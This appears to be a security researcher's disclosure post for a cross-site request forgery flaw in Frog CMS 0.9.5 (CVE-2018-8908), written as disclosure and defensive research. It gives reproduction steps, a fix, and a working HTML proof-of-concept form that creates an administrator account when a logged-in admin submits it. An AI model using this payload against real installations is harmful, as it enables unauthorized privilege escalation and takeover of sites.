By- Samrat Das
Recently while performing some open source security assessment, I came across an CMS Application, “Frog CMS” . Curious to explore its functionalities, I set up a local copy and started playing around to find security vulnerabilities’.
Title of the Vulnerability: Cross Site Request Forgery
Vulnerability Class: Code Execution/ Privilege Escalation
Technical Details & Description: The application source code is coded in a way which allows malicious HTML request to be executed without veryifying source of request.This leads to arbitary execution with malicous request which will lead to the creation of a privileged user.
CVE ID allocated: - CVE-2018-8908
Product & Service Introduction: Frog CMS
Steps to Re-Produce –
1. Visit the application
2. Visit the Add Users Page.
3. Craft an html page with all the details for an admin user creation and host it on a server
4. Upon the link being clicked by a logged in admin user, immidiately, another admin user will get created.
Exploitation Technique: A attacker can create a rogue admin user to gain access to the application.
Severity Level: High
The presence of such a risk can lead to user data compromise as well as privileged user access.
<form action="http://localhost/frog/admin/?/user/add" method="POST">
<input type="hidden" name="user[name]" value="Test_1" />
<input type="hidden" name="user[email]" value="" />
<input type="hidden" name="user[username]" value="test" />
<input type="hidden" name="user[password]" value="test" />
<input type="hidden" name="user[confirm]" value="test" />
<input type="hidden" name="user_permission[administrator]" value="1" />
<input type="hidden" name="commit" value="Save" />
<input type="submit" value="Submit request" />
Affected Product Version: Frog CMS 0.9.5
Solution - Fix & Patch: The application code should be configured to implement anti csrf token to filter malicous HTTP Requests.